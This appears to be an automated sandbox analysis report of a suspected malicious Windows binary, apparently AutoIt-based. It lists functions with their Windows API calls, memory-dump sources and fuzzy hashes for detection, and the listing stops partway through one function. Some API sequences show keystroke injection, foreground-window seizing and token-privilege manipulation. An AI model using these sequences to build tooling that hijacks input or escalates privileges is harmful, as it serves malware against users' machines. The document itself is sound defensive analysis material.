                    Function 00754F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00754D13: FreeLibrary.KERNEL32(00000000,?), ref: 00754D4D
                      • Part of subcall function 0077548B: __wfsopen.LIBCMT ref: 00775496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                      • Part of subcall function 00754CC8: FreeLibrary.KERNEL32(00000000), ref: 00754D02
                      • Part of subcall function 00754DD0: _memmove.LIBCMT ref: 00754E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                    • Instruction ID: 9b85996ae213e75c27b11bea8dabc6836dfdf15f2f7e8367d93d9561e93f5a78
                    • Opcode Fuzzy Hash: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                    • Instruction Fuzzy Hash: B111C432700305EACB24FF74CC1ABEE77A49F40706F10842AFD42A61C1DEB99A4997A0
                    Function 007901AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 1e90bcf655e06b124d9762bda804806b7732ba704b766c30ce7c178e8bcc29bc
                    • Instruction ID: 06a09da074c547cfc41c2e4ae2cc0e8e6e0f14fa9d506e5e51e3cb69596bc5ea
                    • Opcode Fuzzy Hash: 1e90bcf655e06b124d9762bda804806b7732ba704b766c30ce7c178e8bcc29bc
                    • Instruction Fuzzy Hash: 522124B4608341DFCB14DF24C449A5ABBF0BF88304F04896CE98A47721D779E849CB92
                    Function 00755D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                    Download Yara Rule
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00755807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00755D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 13c0c0a2d4738f324bcee4e07cc793ca3f7402786a8be978337e13af1ed5789c
                    • Instruction ID: d3de1e7798d195f84ab8001f1c0cfba16abe6b109fe3a9da55cccd6c7601d16d
                    • Opcode Fuzzy Hash: 13c0c0a2d4738f324bcee4e07cc793ca3f7402786a8be978337e13af1ed5789c
                    • Instruction Fuzzy Hash: 2F113A32200B059FD3308F15C498BA2B7F5EF45751F14C92EE8AA86A50D7B9E949CB60
                    Function 00774A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 00774AD6
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                    • Instruction ID: b0e3878bb30b81d8cde267bd33240aaf88a82152fa9b6f6fe86a6d583b79054a
                    • Opcode Fuzzy Hash: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                    • Instruction Fuzzy Hash: 26F0A471940209DBDFA1AF74CC0E79E3661AF003A5F05C514F42C9A1E1CB7C8950DF51
                    Function 00754FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                    • Instruction ID: eee0fb71e6c985d6b62a3314a1579a11ab5c962b3c24c7cc9a1f9c43fadf9e2c
                    • Opcode Fuzzy Hash: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                    • Instruction Fuzzy Hash: BFF03071105711CFCB349F68D494852BBF1BF0432A3288A3EE9D782650C7B99898DF50
                    Function 007709D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                    • Instruction ID: 93d51480866b3feb73c196d87c2d80b8112b3f080dfbf324821a5947876f5a4f
                    • Opcode Fuzzy Hash: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                    • Instruction Fuzzy Hash: AEE0CD76A4522C97C720E6589C09FFA77FDDF88791F0441B6FC0CD7244E9A5AC818690
                    Function 007B9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 4f921e83a5e53f998686c0c67a99ed12a5746348ad61835b44af2eafafe11f8b
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: 54E092B0104B049FDB348A28D8147E373E0AB06315F00081DF3AA83341EB6778419759
                    Function 00755DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0078E16B,?,?,00000000), ref: 00755DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 0e2a40cadda341365a94222d4fd50b338bc8f7d6406bfb8110bf3b8c29a1215f
                    • Instruction ID: 8882da7e175761d99400c7f9e97f434cc06eee99141a8b48d890a2bad8c274b9
                    • Opcode Fuzzy Hash: 0e2a40cadda341365a94222d4fd50b338bc8f7d6406bfb8110bf3b8c29a1215f
                    • Instruction Fuzzy Hash: 68D0C77464020CBFE710DB80DC46FA9777CD705710F104195FD0456290D6B27D508795
                    Function 0077548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 6c32f6abe5a8c2872584f5f5855b410fbfd7bb3fa0f240d0a093b9aea3742cf7
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 99B0927684020CB7DE012F92EC06A593B199B406B8F808020FB0C18162A6B7A6A09689
                    Function 007BD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 007BD46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: b24a7f320606d951c73c039583b97723c8c0b0228e93e9cf91ef3d5c0f8f77af
                    • Instruction ID: 22dfd1f301173a9a573a0585321e2de5284b71bd1780a2b65f8c7e13439e21f4
                    • Opcode Fuzzy Hash: b24a7f320606d951c73c039583b97723c8c0b0228e93e9cf91ef3d5c0f8f77af
                    • Instruction Fuzzy Hash: 13719434204341CFC724EF24D495BEAB7E0AF88315F04496DF996972A2EB78ED49CB52
                    Function 00770E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 6b5b43f1cc8ab8cf2c757d539664c204df415b16cbec2a896973d4f92ceb9eb6
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 5931AF71A00105DFCB18EE58D480969F7A6FB59380B68CAA5E40ACB651DB75EEC1CBC0
                    Function 036C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 036C22B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 32bb5deb83ee176186f045d23f18d460589b28842bd9c83adbf974aa223303f9
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 98E0E67494020EDFDB00EFB8D5496AE7FB4EF04701F1005A5FD01D2280D6309D508A72

                    Non-executed Functions

                    Function 007DCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007DCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCF00
                    • SendMessageW.USER32 ref: 007DCF29
                    • _wcsncpy.LIBCMT ref: 007DCFA1
                    • GetKeyState.USER32(00000011), ref: 007DCFC2
                    • GetKeyState.USER32(00000009), ref: 007DCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCFE5
                    • GetKeyState.USER32(00000010), ref: 007DCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DD018
                    • SendMessageW.USER32 ref: 007DD03F
                    • SendMessageW.USER32(?,00001030,?,007DB602), ref: 007DD145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DD15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DD16E
                    • SetCapture.USER32(?), ref: 007DD177
                    • ClientToScreen.USER32(?,?), ref: 007DD1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DD1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DD203
                    • ReleaseCapture.USER32 ref: 007DD20E
                    • GetCursorPos.USER32(?), ref: 007DD248
                    • ScreenToClient.USER32(?,?), ref: 007DD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD2B1
                    • SendMessageW.USER32 ref: 007DD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD31C
                    • SendMessageW.USER32 ref: 007DD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD37B
                    • GetCursorPos.USER32(?), ref: 007DD39B
                    • ScreenToClient.USER32(?,?), ref: 007DD3A8
                    • GetParent.USER32(?), ref: 007DD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD431
                    • SendMessageW.USER32 ref: 007DD462
                    • ClientToScreen.USER32(?,?), ref: 007DD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD51A
                    • SendMessageW.USER32 ref: 007DD53D
                    • ClientToScreen.USER32(?,?), ref: 007DD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD5C3
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 3977979337-4164748364
                    • Opcode ID: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                    • Instruction ID: dd6fb6bbbb91a6a51723c0a86d7caba234147e1f3c135aa906ac42d2e08f79a3
                    • Opcode Fuzzy Hash: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                    • Instruction Fuzzy Hash: 28428C70209251AFD722CF28C848AAABBF5FF48314F14452EF696973A1D739D854CF92
                    Function 007D804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007D873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: 45f68b02b3abb11207cb1b5f9a2f517cda42529fac4481fd3e3eeeb78c8860da
                    • Instruction ID: 4421318b62d5a929ca149abecdc773add703dab6dd4ed697e70e832e496413e4
                    • Opcode Fuzzy Hash: 45f68b02b3abb11207cb1b5f9a2f517cda42529fac4481fd3e3eeeb78c8860da
                    • Instruction Fuzzy Hash: F812E471501208EFEB658F68CC49FAE7BB8EF45710F14812AF916EA2E1DF789941CB11
                    Function 0076710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oav$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-3379304892
                    • Opcode ID: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                    • Instruction ID: 6e3956deca3e1ea21a2e7347570d878dd05f40e8d75d4ea51f75d0d99c68a7b0
                    • Opcode Fuzzy Hash: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                    • Instruction Fuzzy Hash: BC93A371E04215DFDB28CF58C8817ADB7B1FF89314F24826AE945EB281E7799E81CB50
                    Function 00754A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00754A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078DA8E
                    • IsIconic.USER32(?), ref: 0078DA97
                    • ShowWindow.USER32(?,00000009), ref: 0078DAA4
                    • SetForegroundWindow.USER32(?), ref: 0078DAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078DAC4
                    • GetCurrentThreadId.KERNEL32 ref: 0078DACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078DAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0078DAF8
                    • SetForegroundWindow.USER32(?), ref: 0078DAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB10
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB25
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB33
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB42
                    • keybd_event.USER32(00000012,00000000), ref: 0078DB47
                    • SetForegroundWindow.USER32(?), ref: 0078DB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 0078DB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                    • Instruction ID: 90e7a6d64bad194c5cb69a1dd240ac80b3016d617f9e79d83e3a82c7d2f91f26
                    • Opcode Fuzzy Hash: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                    • Instruction Fuzzy Hash: 7E317571A81318BBEB306FA19C49F7E3F7CEB44B50F158066FA06E61D0C6B45D10ABA5
                    Function 007A8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                      • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                      • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                    • _memset.LIBCMT ref: 007A889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A88ED
                    • CloseHandle.KERNEL32(?), ref: 007A88FE
